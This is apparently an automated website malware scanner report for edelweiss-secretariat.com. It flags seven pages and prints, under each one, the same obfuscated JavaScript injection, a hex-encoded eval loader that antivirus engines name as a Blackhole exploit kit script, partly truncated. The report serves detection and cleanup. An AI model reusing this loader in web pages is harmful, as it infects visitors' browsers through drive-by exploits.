Malware Scanner report for edelweiss-secretariat.com

Malicious/Suspicious/Total urls checked: 7/0/8

7 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "edelweiss-secretariat.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=edelweiss-secretariat.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://edelweiss-secretariat.com/	200 OK Content-Length: 14844 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) mtkmp="y";wndup="document";try{+function(){if(document.querySelector)--(window[wndup].getElementById("asd"))}()}catch(nozq){mmyzf=function(sjqdy){sjqdy="fro"+sjqdy;for(khdnus=0;khdnus<mtkmp.length;khdnus++){sgyb+=String[sjqdy](ktcw(csmv+(mtkmp[khdnus]))-(29));}};};ktcw=eval;csmv="0x";xpzuwx=0;if(!xpzuwx){try{++ktcw(wndup).body}catch(nozq){oismz="(";}mtkmp="3d(83(92(8b(80(91(86(8c(8b(3d(8e(88(4d(56(45(46(3d(98(2a(27(3d(93(7e(8f(3d(90(91(7e(91(86(80(5a(44(7e(87(7e(95(44(58(2a(27(3d(93(7e(8f(3d( ... 3522 bytes are skipped ...45(3d(89(82(8b(49(3d(82(8b(81(3d(46(3d(46(58(2a(27(9a(2a(27(86(83(3d(45(8b(7e(93(86(84(7e(91(8c(8f(4b(80(8c(8c(88(86(82(62(8b(7e(7f(89(82(81(46(2a(27(98(2a(27(86(83(45(64(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(46(5a(5a(52(52(46(98(9a(82(89(90(82(98(70(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(49(3d(44(52(52(44(49(3d(44(4e(44(49(3d(44(4c(44(46(58(2a(27(2a(27(8e(88(4d(56(45(46(58(2a(27(9a(2a(27(9a".split(oismz);sgyb="";mmyzf("mCharCode");ktcw(""+sgyb);} Antivirus reports: AntiVir JS/Blacole.EB.182 Avast JS:Decode-BKU [Trj] Ad-Aware JS:Exploit.BlackHole.PG Bkav MW.Clodfc8.Trojan.21b7 Ikarus Exploit.JS.Blacole nProtect JS:Exploit.BlackHole.PG TrendMicro-HouseCall TROJ_GEN.F47V1030 Comodo UnclassifiedMalware Emsisoft JS:Exploit.BlackHole.PG (B) McAfee-GW-Edition JS/Exploit-Blacole.ht Microsoft Exploit:JS/Blacole.OF MicroWorld-eScan JS:Exploit.BlackHole.PG Fortinet JS/Kryptik.HOL!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Iframe.bopaxv F-Secure JS:Exploit.BlackHole.PG VIPRE Exploit.JS.Blacole.of (v) AVG JS/Exploit Norman Blacole.XD GData JS:Exploit.BlackHole.PG BitDefender JS:Exploit.BlackHole.PG
http://edelweiss-secretariat.com/backtothehtml.js	200 OK Content-Length: 11642 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) mtkmp="y";wndup="document";try{+function(){if(document.querySelector)--(window[wndup].getElementById("asd"))}()}catch(nozq){mmyzf=function(sjqdy){sjqdy="fro"+sjqdy;for(khdnus=0;khdnus<mtkmp.length;khdnus++){sgyb+=String[sjqdy](ktcw(csmv+(mtkmp[khdnus]))-(29));}};};ktcw=eval;csmv="0x";xpzuwx=0;if(!xpzuwx){try{++ktcw(wndup).body}catch(nozq){oismz="(";}mtkmp="3d(83(92(8b(80(91(86(8c(8b(3d(8e(88(4d(56(45(46(3d(98(2a(27(3d(93(7e(8f(3d(90(91(7e(91(86(80(5a(44(7e(87(7e(95(44(58(2a(27(3d(93(7e(8f(3d( ... 3522 bytes are skipped ...45(3d(89(82(8b(49(3d(82(8b(81(3d(46(3d(46(58(2a(27(9a(2a(27(86(83(3d(45(8b(7e(93(86(84(7e(91(8c(8f(4b(80(8c(8c(88(86(82(62(8b(7e(7f(89(82(81(46(2a(27(98(2a(27(86(83(45(64(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(46(5a(5a(52(52(46(98(9a(82(89(90(82(98(70(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(49(3d(44(52(52(44(49(3d(44(4e(44(49(3d(44(4c(44(46(58(2a(27(2a(27(8e(88(4d(56(45(46(58(2a(27(9a(2a(27(9a".split(oismz);sgyb="";mmyzf("mCharCode");ktcw(""+sgyb);} Antivirus reports: AntiVir JS/Blacole.EB.182 Avast JS:Decode-BKU [Trj] Ad-Aware JS:Exploit.BlackHole.PG Bkav MW.Clodfc8.Trojan.21b7 Ikarus Exploit.JS.Blacole nProtect JS:Exploit.BlackHole.PG TrendMicro-HouseCall TROJ_GEN.F47V1030 Comodo UnclassifiedMalware Emsisoft JS:Exploit.BlackHole.PG (B) McAfee-GW-Edition JS/Exploit-Blacole.ht Microsoft Exploit:JS/Blacole.OF MicroWorld-eScan JS:Exploit.BlackHole.PG Fortinet JS/Kryptik.HOL!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Iframe.bopaxv F-Secure JS:Exploit.BlackHole.PG VIPRE Exploit.JS.Blacole.of (v) AVG JS/Exploit Norman Blacole.XD GData JS:Exploit.BlackHole.PG BitDefender JS:Exploit.BlackHole.PG
http://edelweiss-secretariat.com/services.html	200 OK Content-Length: 15259 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) mtkmp="y";wndup="document";try{+function(){if(document.querySelector)--(window[wndup].getElementById("asd"))}()}catch(nozq){mmyzf=function(sjqdy){sjqdy="fro"+sjqdy;for(khdnus=0;khdnus<mtkmp.length;khdnus++){sgyb+=String[sjqdy](ktcw(csmv+(mtkmp[khdnus]))-(29));}};};ktcw=eval;csmv="0x";xpzuwx=0;if(!xpzuwx){try{++ktcw(wndup).body}catch(nozq){oismz="(";}mtkmp="3d(83(92(8b(80(91(86(8c(8b(3d(8e(88(4d(56(45(46(3d(98(2a(27(3d(93(7e(8f(3d(90(91(7e(91(86(80(5a(44(7e(87(7e(95(44(58(2a(27(3d(93(7e(8f(3d( ... 3522 bytes are skipped ...45(3d(89(82(8b(49(3d(82(8b(81(3d(46(3d(46(58(2a(27(9a(2a(27(86(83(3d(45(8b(7e(93(86(84(7e(91(8c(8f(4b(80(8c(8c(88(86(82(62(8b(7e(7f(89(82(81(46(2a(27(98(2a(27(86(83(45(64(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(46(5a(5a(52(52(46(98(9a(82(89(90(82(98(70(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(49(3d(44(52(52(44(49(3d(44(4e(44(49(3d(44(4c(44(46(58(2a(27(2a(27(8e(88(4d(56(45(46(58(2a(27(9a(2a(27(9a".split(oismz);sgyb="";mmyzf("mCharCode");ktcw(""+sgyb);} Antivirus reports: AntiVir JS/Blacole.EB.182 Avast JS:Decode-BKU [Trj] Ad-Aware JS:Exploit.BlackHole.PG Bkav MW.Clodfc8.Trojan.21b7 Ikarus Exploit.JS.Blacole nProtect JS:Exploit.BlackHole.PG TrendMicro-HouseCall TROJ_GEN.F47V1030 Comodo UnclassifiedMalware Emsisoft JS:Exploit.BlackHole.PG (B) McAfee-GW-Edition JS/Exploit-Blacole.ht Microsoft Exploit:JS/Blacole.OF MicroWorld-eScan JS:Exploit.BlackHole.PG Fortinet JS/Kryptik.HOL!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Iframe.bopaxv F-Secure JS:Exploit.BlackHole.PG VIPRE Exploit.JS.Blacole.of (v) AVG JS/Exploit Norman Blacole.XD GData JS:Exploit.BlackHole.PG BitDefender JS:Exploit.BlackHole.PG
http://edelweiss-secretariat.com/index.html	200 OK Content-Length: 14844 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) mtkmp="y";wndup="document";try{+function(){if(document.querySelector)--(window[wndup].getElementById("asd"))}()}catch(nozq){mmyzf=function(sjqdy){sjqdy="fro"+sjqdy;for(khdnus=0;khdnus<mtkmp.length;khdnus++){sgyb+=String[sjqdy](ktcw(csmv+(mtkmp[khdnus]))-(29));}};};ktcw=eval;csmv="0x";xpzuwx=0;if(!xpzuwx){try{++ktcw(wndup).body}catch(nozq){oismz="(";}mtkmp="3d(83(92(8b(80(91(86(8c(8b(3d(8e(88(4d(56(45(46(3d(98(2a(27(3d(93(7e(8f(3d(90(91(7e(91(86(80(5a(44(7e(87(7e(95(44(58(2a(27(3d(93(7e(8f(3d( ... 3522 bytes are skipped ...45(3d(89(82(8b(49(3d(82(8b(81(3d(46(3d(46(58(2a(27(9a(2a(27(86(83(3d(45(8b(7e(93(86(84(7e(91(8c(8f(4b(80(8c(8c(88(86(82(62(8b(7e(7f(89(82(81(46(2a(27(98(2a(27(86(83(45(64(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(46(5a(5a(52(52(46(98(9a(82(89(90(82(98(70(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(49(3d(44(52(52(44(49(3d(44(4e(44(49(3d(44(4c(44(46(58(2a(27(2a(27(8e(88(4d(56(45(46(58(2a(27(9a(2a(27(9a".split(oismz);sgyb="";mmyzf("mCharCode");ktcw(""+sgyb);} Antivirus reports: AntiVir JS/Blacole.EB.182 Avast JS:Decode-BKU [Trj] Ad-Aware JS:Exploit.BlackHole.PG Bkav MW.Clodfc8.Trojan.21b7 Ikarus Exploit.JS.Blacole nProtect JS:Exploit.BlackHole.PG TrendMicro-HouseCall TROJ_GEN.F47V1030 Comodo UnclassifiedMalware Emsisoft JS:Exploit.BlackHole.PG (B) McAfee-GW-Edition JS/Exploit-Blacole.ht Microsoft Exploit:JS/Blacole.OF MicroWorld-eScan JS:Exploit.BlackHole.PG Fortinet JS/Kryptik.HOL!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Iframe.bopaxv F-Secure JS:Exploit.BlackHole.PG VIPRE Exploit.JS.Blacole.of (v) AVG JS/Exploit Norman Blacole.XD GData JS:Exploit.BlackHole.PG BitDefender JS:Exploit.BlackHole.PG
http://edelweiss-secretariat.com/references.html	200 OK Content-Length: 14140 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) mtkmp="y";wndup="document";try{+function(){if(document.querySelector)--(window[wndup].getElementById("asd"))}()}catch(nozq){mmyzf=function(sjqdy){sjqdy="fro"+sjqdy;for(khdnus=0;khdnus<mtkmp.length;khdnus++){sgyb+=String[sjqdy](ktcw(csmv+(mtkmp[khdnus]))-(29));}};};ktcw=eval;csmv="0x";xpzuwx=0;if(!xpzuwx){try{++ktcw(wndup).body}catch(nozq){oismz="(";}mtkmp="3d(83(92(8b(80(91(86(8c(8b(3d(8e(88(4d(56(45(46(3d(98(2a(27(3d(93(7e(8f(3d(90(91(7e(91(86(80(5a(44(7e(87(7e(95(44(58(2a(27(3d(93(7e(8f(3d( ... 3522 bytes are skipped ...45(3d(89(82(8b(49(3d(82(8b(81(3d(46(3d(46(58(2a(27(9a(2a(27(86(83(3d(45(8b(7e(93(86(84(7e(91(8c(8f(4b(80(8c(8c(88(86(82(62(8b(7e(7f(89(82(81(46(2a(27(98(2a(27(86(83(45(64(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(46(5a(5a(52(52(46(98(9a(82(89(90(82(98(70(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(49(3d(44(52(52(44(49(3d(44(4e(44(49(3d(44(4c(44(46(58(2a(27(2a(27(8e(88(4d(56(45(46(58(2a(27(9a(2a(27(9a".split(oismz);sgyb="";mmyzf("mCharCode");ktcw(""+sgyb);} Antivirus reports: AntiVir JS/Blacole.EB.182 Avast JS:Decode-BKU [Trj] Ad-Aware JS:Exploit.BlackHole.PG Bkav MW.Clodfc8.Trojan.21b7 Ikarus Exploit.JS.Blacole nProtect JS:Exploit.BlackHole.PG TrendMicro-HouseCall TROJ_GEN.F47V1030 Comodo UnclassifiedMalware Emsisoft JS:Exploit.BlackHole.PG (B) McAfee-GW-Edition JS/Exploit-Blacole.ht Microsoft Exploit:JS/Blacole.OF MicroWorld-eScan JS:Exploit.BlackHole.PG Fortinet JS/Kryptik.HOL!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Iframe.bopaxv F-Secure JS:Exploit.BlackHole.PG VIPRE Exploit.JS.Blacole.of (v) AVG JS/Exploit Norman Blacole.XD GData JS:Exploit.BlackHole.PG BitDefender JS:Exploit.BlackHole.PG
http://edelweiss-secretariat.com/partenaires.html	200 OK Content-Length: 14360 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) mtkmp="y";wndup="document";try{+function(){if(document.querySelector)--(window[wndup].getElementById("asd"))}()}catch(nozq){mmyzf=function(sjqdy){sjqdy="fro"+sjqdy;for(khdnus=0;khdnus<mtkmp.length;khdnus++){sgyb+=String[sjqdy](ktcw(csmv+(mtkmp[khdnus]))-(29));}};};ktcw=eval;csmv="0x";xpzuwx=0;if(!xpzuwx){try{++ktcw(wndup).body}catch(nozq){oismz="(";}mtkmp="3d(83(92(8b(80(91(86(8c(8b(3d(8e(88(4d(56(45(46(3d(98(2a(27(3d(93(7e(8f(3d(90(91(7e(91(86(80(5a(44(7e(87(7e(95(44(58(2a(27(3d(93(7e(8f(3d( ... 3522 bytes are skipped ...45(3d(89(82(8b(49(3d(82(8b(81(3d(46(3d(46(58(2a(27(9a(2a(27(86(83(3d(45(8b(7e(93(86(84(7e(91(8c(8f(4b(80(8c(8c(88(86(82(62(8b(7e(7f(89(82(81(46(2a(27(98(2a(27(86(83(45(64(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(46(5a(5a(52(52(46(98(9a(82(89(90(82(98(70(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(49(3d(44(52(52(44(49(3d(44(4e(44(49(3d(44(4c(44(46(58(2a(27(2a(27(8e(88(4d(56(45(46(58(2a(27(9a(2a(27(9a".split(oismz);sgyb="";mmyzf("mCharCode");ktcw(""+sgyb);} Antivirus reports: AntiVir JS/Blacole.EB.182 Avast JS:Decode-BKU [Trj] Ad-Aware JS:Exploit.BlackHole.PG Bkav MW.Clodfc8.Trojan.21b7 Ikarus Exploit.JS.Blacole nProtect JS:Exploit.BlackHole.PG TrendMicro-HouseCall TROJ_GEN.F47V1030 Comodo UnclassifiedMalware Emsisoft JS:Exploit.BlackHole.PG (B) McAfee-GW-Edition JS/Exploit-Blacole.ht Microsoft Exploit:JS/Blacole.OF MicroWorld-eScan JS:Exploit.BlackHole.PG Fortinet JS/Kryptik.HOL!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Iframe.bopaxv F-Secure JS:Exploit.BlackHole.PG VIPRE Exploit.JS.Blacole.of (v) AVG JS/Exploit Norman Blacole.XD GData JS:Exploit.BlackHole.PG BitDefender JS:Exploit.BlackHole.PG
http://edelweiss-secretariat.com/contacts.html	200 OK Content-Length: 14183 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) mtkmp="y";wndup="document";try{+function(){if(document.querySelector)--(window[wndup].getElementById("asd"))}()}catch(nozq){mmyzf=function(sjqdy){sjqdy="fro"+sjqdy;for(khdnus=0;khdnus<mtkmp.length;khdnus++){sgyb+=String[sjqdy](ktcw(csmv+(mtkmp[khdnus]))-(29));}};};ktcw=eval;csmv="0x";xpzuwx=0;if(!xpzuwx){try{++ktcw(wndup).body}catch(nozq){oismz="(";}mtkmp="3d(83(92(8b(80(91(86(8c(8b(3d(8e(88(4d(56(45(46(3d(98(2a(27(3d(93(7e(8f(3d(90(91(7e(91(86(80(5a(44(7e(87(7e(95(44(58(2a(27(3d(93(7e(8f(3d( ... 3522 bytes are skipped ...45(3d(89(82(8b(49(3d(82(8b(81(3d(46(3d(46(58(2a(27(9a(2a(27(86(83(3d(45(8b(7e(93(86(84(7e(91(8c(8f(4b(80(8c(8c(88(86(82(62(8b(7e(7f(89(82(81(46(2a(27(98(2a(27(86(83(45(64(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(46(5a(5a(52(52(46(98(9a(82(89(90(82(98(70(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(49(3d(44(52(52(44(49(3d(44(4e(44(49(3d(44(4c(44(46(58(2a(27(2a(27(8e(88(4d(56(45(46(58(2a(27(9a(2a(27(9a".split(oismz);sgyb="";mmyzf("mCharCode");ktcw(""+sgyb);} Antivirus reports: AntiVir JS/Blacole.EB.182 Avast JS:Decode-BKU [Trj] Ad-Aware JS:Exploit.BlackHole.PG Bkav MW.Clodfc8.Trojan.21b7 Ikarus Exploit.JS.Blacole nProtect JS:Exploit.BlackHole.PG TrendMicro-HouseCall TROJ_GEN.F47V1030 Comodo UnclassifiedMalware Emsisoft JS:Exploit.BlackHole.PG (B) McAfee-GW-Edition JS/Exploit-Blacole.ht Microsoft Exploit:JS/Blacole.OF MicroWorld-eScan JS:Exploit.BlackHole.PG Fortinet JS/Kryptik.HOL!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Iframe.bopaxv F-Secure JS:Exploit.BlackHole.PG VIPRE Exploit.JS.Blacole.of (v) AVG JS/Exploit Norman Blacole.XD GData JS:Exploit.BlackHole.PG BitDefender JS:Exploit.BlackHole.PG
http://edelweiss-secretariat.com/test404page.js	404 Not Found Content-Length: 212 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: edelweiss-secretariat.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 11 Jan 2015 04:43:28 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 14844
Content-Type: text/html
Set-Cookie: 60gpBAK=R1224193598; path=/; expires=Sun, 11-Jan-2015 05:58:17 GMT
Set-Cookie: 60gp=R477163721; path=/; expires=Sun, 11-Jan-2015 05:49:36 GMT

...14844 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: edelweiss-secretariat.com
Referer: http://www.google.com/search?q=edelweiss-secretariat.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for edelweiss-secretariat.com

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools